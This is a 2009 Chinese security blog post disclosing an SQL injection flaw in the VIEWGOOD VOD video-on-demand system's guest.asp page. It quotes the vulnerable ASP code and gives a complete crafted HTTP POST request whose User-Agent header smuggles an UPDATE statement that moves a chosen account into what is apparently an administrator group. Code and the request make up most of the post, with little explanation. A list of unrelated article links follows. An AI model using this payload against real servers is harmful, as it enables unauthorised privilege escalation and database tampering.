远古视频点播系统的一个注入漏洞
作者:toby57 来源:Wolves Security Team 时间:2009-03-01 12:54:00
VIEWGOOD VOD视频点播系统 (WebVOD)
漏洞产生于文件/webmedia/oemui/user/guest.asp,访问这个页面需要注册
相关代码:
szAgent = Request.ServerVariables("HTTP_USER_AGENT")
aTmpInfo = Split(szAgent, " (", -1, 1)
aAgentInfo = Split(aTmpInfo(1), "; ", -1, 1)
szBrowser = aAgentInfo(1)
if Right(aAgentInfo(2), 1) = ")" or Right(aAgentInfo(2), 1) = ";" then
szOS = Left(aAgentInfo(2), Len(aAgentInfo(2)) - 1)
else
szOS = aAgentInfo(2)
end if
szClientIP = Request.ServerVariables("REMOTE_ADDR")
szSQL = "INSERT INTO GuestBook(CusTomer_ID,cont,ipaddr,ostype,browser,crdt) VALUES(" & iUserID & ",'" & szMemo & "','" & szClientIP & "','" & szOS & "','" & szBrowser & "','" & now &"')"
con.Execute szSQL
HTTP_USER_AGENT我们可以自己构造
POST /webmedia/oemui/user/guest.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
Referer: [url]http://you.are.fucked.cn/webmedia/oemui/user/guest.asp[/url]
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0','');update Customer_Group set Group_ID=1 where Customer_ID=9--; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: you.are.fucked.cn
Content-Length: 75
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDCSACDTQQ=CGGFJOGANCPNAIAIABABHMHA;
memo=aaaa&submit=%B7%A2%CB%CD%D3%C3%BB%A7%C1%F4%D1%D4%D0%C5%CF%A2+%3E%3E%3E
标签:漏洞,注入,视频,安全
0
投稿
猜你喜欢
在Ubuntu Linux上安装和使用Git和GitHub
2021-01-01 22:23:19
Godaddy主机安装问题
2010-04-17 12:55:00
简单分析3款小巧cms建站程序
2009-01-06 12:24:00
windows apache多端口虚拟主机配置方法
2023-06-29 08:20:27
Qmail邮件服务器安装过程
2007-03-27 09:49:00
浅析Apache服务器中SSI和CGI设定方法
2010-05-08 17:59:00
Windows 2003 邮件服务器全攻略
2008-06-10 12:09:00
雅虎与玫琳凯商标侵权官司和解 赔偿金不详
2009-11-08 18:45:00
在Ubuntu20.04中安装ROS Noetic的方法
2023-04-19 03:46:44
AdSense网页投放几个广告单元收入最高?
2007-11-22 19:50:00
使用Docker部署Spring Boot的应用示例
2021-02-01 22:58:18
更改windows 2003远程桌面连接的端口
2010-08-09 21:26:00
保护IIS服务器的15个小技巧
2008-07-01 12:32:00
熟悉FTP命令
2009-03-02 17:26:00
B2B电子商务网站优化中的典型问题
2009-08-22 09:03:00
用mail服务器构架多域名邮件服务系统
2007-03-28 10:14:00
周鸿祎炮轰杀毒厂商:十年未更新 年赚几个亿
2009-11-18 09:26:00
VMVare虚拟机网络配置步骤
2023-11-03 13:41:35
垃圾站如何提高GG广告的点击率与单价
2008-10-06 12:54:00
Ubuntu 20.04系统中安装vncserver的方法步骤
2023-07-13 22:17:12